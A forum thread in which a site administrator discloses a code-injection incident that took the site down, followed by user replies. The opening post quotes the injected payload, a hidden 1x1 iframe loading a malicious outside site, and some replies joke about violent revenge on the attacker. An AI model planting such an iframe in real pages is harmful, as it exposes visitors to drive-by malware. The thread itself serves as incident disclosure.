• Sign in to Neowin Faster!

    Create an account on Neowin to contribute and support the site.

Sign in to follow this  

Dec 4th: Todays downtime due to exploit

Recommended Posts

Steven P.    12,762

Someone discovered a way to insert the following code into the Main website (news section) and forums:

<iframe src='http://softspydelete.com/strong/044/' width=1 height=1></iframe>

Above is an example, it appeared on a few locations throughout the forums, and in news posts on the main news site.

This also enabled us to finally upgrade our IPB software to the latest version (from 2.3.1 to 2.3.3) Marcel was limited with the time he had because he was at work, so temporarily the friendly urls on the main site were non-functional after the forums and website came back online. DaveLegg was able to fix this a short time ago.

The exploit has since not re-appeared so we think it has been averted, but a more thorough investigation will most likely reveal who was able to inject code into our system.

Thanks for your patience and support of Neowin on this matter. Remember, never install plug-ins from Neowin unless you know for sure what you are doing.

Neowin does not require plug--ins or active-x controls in order to view it!

Share this post


Link to post
Share on other sites
forster    23

Thanks Neobond, wondered what the problem was.

Good to see the site back. Gives me something to do on my day off (Y)

Share this post


Link to post
Share on other sites
Stone Gaijin    0

thanks for the quick solution.

Share this post


Link to post
Share on other sites
.kvn    0

Good to see you back too. Earlier I went on the irc channel and DaveLegg was kind enough to explain you would be back on soon.

Share this post


Link to post
Share on other sites
+BeLGaRaTh    43

Thanks for the explanation, was wondering what was happening with the links on the front page, so my thread asking about it can be safely closed/destroyed now :)

Hope you find out who the culprit was and lynch them :)

Share this post


Link to post
Share on other sites
snyper    0

I was never informed of this shutdown :angry:

:p

Nice Job Dave.

If you find the asswipe that is responsible, forward on their details to me, i will take it from there. Suffice to say they wont be inserting anymore code without fingers

Share this post


Link to post
Share on other sites
Shof    0

that iframe code needs to find a way to never exist again. Multiple sites just like neowin are getting attack due to them

Share this post


Link to post
Share on other sites
+Tikimotel    21

The mentioned website has a russian registrant...

With many phising attacks coming from eastern europe it doesn't surprise me if that guy also hacked neowin to insert code to aid him in phising.

Share this post


Link to post
Share on other sites
sundayx    127

I thought I lost my life for one morning there... joking... and... I'll... just leave.

Share this post


Link to post
Share on other sites
tunafish    7

or sanatise your inputs to the database :)

Share this post


Link to post
Share on other sites
wst50    0
...they wont be inserting anymore code without fingers

Or inserting anything else...

Give 'em baked bean can love eggs...

Share this post


Link to post
Share on other sites
Steven P.    12,762

I am pretty sure we have the IP of the person who did this, he left a trail (probably not intentionally) but we found one none-the-less.

Share this post


Link to post
Share on other sites
snyper    0

Why ppl hack websites is beyond me.

Share this post


Link to post
Share on other sites
Shaun N.    569
I am pretty sure we have the IP of the person who did this, he left a trail (probably not intentionally) but we found one none-the-less.

He eh :shifty:

Share this post


Link to post
Share on other sites
NateB1    75
I am pretty sure we have the IP of the person who did this, he left a trail (probably not intentionally) but we found one none-the-less.

Do you know roughly where in the world the IP address belongs? Russia? Eastern Europe? China?

Share this post


Link to post
Share on other sites
Jimmy0    38

Good to see the team working so nicely to get Neowin back online so fast. Thanks guys! (Y)

Share this post


Link to post
Share on other sites
Damo R.    29,658

I thought my constant sig/av changes had done the site for good :laugh:

Good work tho lets hope you catch the idiot.

Share this post


Link to post
Share on other sites
Allan    33
I thought my constant sig/av changes had done the site for good :laugh:

Good work tho lets hope you catch the idiot.

I figured it was either that, your spam, or the combo of you and snyper spammin' that caused the DDOS :rofl:

Share this post


Link to post
Share on other sites
Damo R.    29,658
I figured it was either that, your spam, or the combo of you and snyper spammin' that caused the DDOS:rofl::

Me Spam its all lies I tell you...lies!!!:shifty::

Share this post


Link to post
Share on other sites
Blaine    2
I was never informed of this shutdown :angry:

:p

Nice Job Dave.

If you find the asswipe that is responsible, forward on their details to me, i will take it from there. Suffice to say they wont be inserting anymore code without fingers

:p sick em' snyper!

Share this post


Link to post
Share on other sites
LOC    980

Maybe it's the Comcast employee who's killing my intarwebz the past week or so?! KILL HIM!

Share this post


Link to post
Share on other sites
Fred Derf    214
I am pretty sure we have the IP of the person who did this, he left a trail (probably not intentionally) but we found one none-the-less.

bbqyg3.gif

Share this post


Link to post
Share on other sites
Evolution    16

But who would be stupid enough to hack without using an anonymous proxy or from a public location?

Share this post


Link to post
Share on other sites
Shof    0

maybe some kind of mafia?

Share this post


Link to post
Share on other sites
KoL    36

Good job guys :) nice to see Neowin back online fast

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.